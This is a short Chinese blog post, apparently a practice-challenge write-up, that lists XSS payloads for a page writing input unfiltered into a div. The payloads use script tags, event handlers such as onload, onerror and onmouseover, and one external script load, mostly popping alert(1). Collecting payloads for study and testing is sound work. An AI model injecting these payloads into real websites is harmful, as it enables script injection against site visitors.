date
Aug 5, 2021 12:17 PM
Related to 日程数据 1 (blog)
tags
slug
summary
icon
category
password
膜拜大神
![archives [ Mi1k7ea ]](https://www.mi1k7ea.com/1.jpg)
无任何过滤直接往div标签内写内容,直接上payload即可。下面将本次用到的XSS payload小结如下:
<script>alert(1)</script> <body onload=alert(1)> <body/onload=alert(1)> <svg onload=alert(1)> <svg/onload=alert(1)> <img src onerror=alert(1)> <input type=image src onerror=alert(1)> <script src="https://xss.haozi.me/j.js"></script>//加载外部js <input type=button onclick="alert(1)">//点击按钮 <input onmouseover=alert(1)>//鼠标指针移动到指定的元素上时执行 <input onmousemove=alert(1)>//鼠标移动时执行 ......还有其他onmouse系列 <img src=javascript: onmouseover="alert(1)">//鼠标移动指向图片 <img src=javascript: onclick="alert(1)">//鼠标点击图片
- 作者:lea
- 链接:https://bear4.ml/article/xss
- 声明:本文采用 CC BY-NC-SA 4.0 许可协议,转载请注明出处。
